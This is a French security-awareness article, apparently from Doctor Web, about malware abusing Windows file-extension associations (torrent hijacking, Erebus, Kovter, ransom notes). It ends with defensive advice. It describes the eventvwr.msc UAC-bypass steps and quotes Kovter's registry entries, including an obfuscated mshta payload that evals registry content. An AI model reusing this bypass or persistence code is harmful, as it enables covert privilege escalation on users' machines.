Vous utilisez un navigateur obsolète !

L'affichage de la page peut être incorrect.

Hôtes indésirables

Незваные гости

D'autres publications de cette rubrique (31)
  • Ajouter aux favoris
    Ajouter aux favoris

Et encore à propos des extensions

Lu par: 21125 Commentaires: 2 Cote de popularité: 10

mardi 3 octobre 2017

Dans la publication « Le point suivi de points de suspension » nous avons expliqué comment les escrocs utilisent les extensions de fichiers pour tromper les utilisateurs. Mais cette publication ne décrit pas toutes les astuces des pirates liées à l'utilisation des extensions.

Comme nous l’avons déjà mentionné, l’extension de fichier correspond à certaines actions que le système d'exploitation doit exécuter si l'utilisateur clique sur le fichier. Par exemple, si c'est un fichier avec l'extension png, un programme destiné à la visualisation et l'édition de fichiers graphiques sera lancé. Que se passera-t-il si vous cliquez sur un fichier ayant l'extension .torrent ?

Le logiciel Program.MediaGet s'installe en tant que client torrent par défaut, et il change les associations des fichiers .torrent dans le registre.

Program.Zona vérifie les paramètres liés à la correspondance aux fichiers .torrent, et dans le cas où Zone n'est pas le programme défini par défaut pour ouvrir ces fichiers, il propose de l'associer aux fichiers .torrent.

Autrement dit, en cliquant sur le lien, vous lancez un programme malveillant. Et très probablement, vous serez prêt à confirmer le lancement de l'application tout en pensant que c'est un client torrent qui démarre.

Le Contrôle de compte utilisateur (UAC) va montrer quel programme démarre en réalité, mais les pirates sont en mesure de le déjouer en utilisant des extensions.

La méthode permettant de contourner le système de contrôle de compte utilisateur (UAC) est la suivante.

  1. Erebus se copie dans le dossier système sous forme de fichier avec un nom aléatoire puis il apporte des modifications dans le Registre Windows afin de remplacer l'association pour l'extension .msc et exécuter ce nouveau fichier ayant un nom aléatoire.
  2. Ensuite, Erebus lance le fichier eventvwr.exe fichier (Observateur d’événements) qui ouvre automatiquement le fichier eventvwr.msc.
  3. Puisque le fichier .msc n’est plus associé à mmc.exe (Microsoft Management Console), eventvwr.exe lancera le fichier de l'extorqueur. L’observateur d’événements s’exécute avec les privilèges élevés, par conséquent, le fichier exécutable aura les mêmes privilèges, ce qui lui permettra de contourner UAC.

https://twitter.com/malwrhunterteam/status/828957753121112064

Ici, les malfaiteurs utilisent le fait qu'un certain nombre de logiciels système sont chargé en mémoire avec des droits élevés, permettant aux fichiers malveillants de démarrer à leur place ou d’après leurs extensions.

Comment l’association est-elle organisée ? C'est facile. Par exemple, le Trojan sans corps Trojan.Kovter.297 enregistre les fichiers ayant l’extension dont il a besoin puis les utilise comme des déclencheurs pour son lancement.

SET "#reg_any" Key="\REGISTRY\USER\S-1-5-21-2963211352-318565981-831850675-1001_CLASSES\.2c1a69e" Value="" Type=1 Data=bf1570\0

SET "#reg_any" Key="\REGISTRY\USER\S-1-5-21-2963211352-318565981-831850675-1001_CLASSES\bf1570\shell\open\command" Value="" Type=1 Data=mshta "javascript:qZ7sOhCI8q="EHHH";n7x=new ActiveXObject("WScript.Shell");DsJb4wGJs4="BtEe";j1ZSp8=n7x.RegRead("HKCU\\software\\isidaqnf\\amqoasyj");k7pfpsNfb="1beAz2j";eval(j1ZSp8);EHJ71gfGFX="2OxujZ1jpC";"

La procédure la plus inoffensive que les auteurs de virus appliquent aux extensions consiste à créer des associations pour les fichiers créés par un programme malveillant qui servent à notifier leurs victimes sur une rançon demandée.

Trojan.Encoder.12950 place dans le système un script qui va afficher des demandes de rançon et il l'enregistre dans l'association pour l'extension *.dcry.

Le projet Lumières sur la sécurité recommande

  1. Le Contrôle de compte utilisateur (UAC) Windows affiche des requêtes pour le lancement de n'importe quelle application. N’oubliez pas de le maintenir activé.
  2. Veuillez lire attentivement les messages du système de Contrôle de compte utilisateur (UAC), pour identifier les fichiers qui tentent de démarrer.
  3. Utilisez un antivirus. Seul l'antivirus peut résister aux activités des pirates.

[Twitter]

Nous apprécions vos commentaires

Pour laisser un commentaire, vous devez accéder au site via votre compte sur le site de Doctor Web. Si vous n'avez pas de compte, vous pouvez le créer.

Commentaires des utilisateurs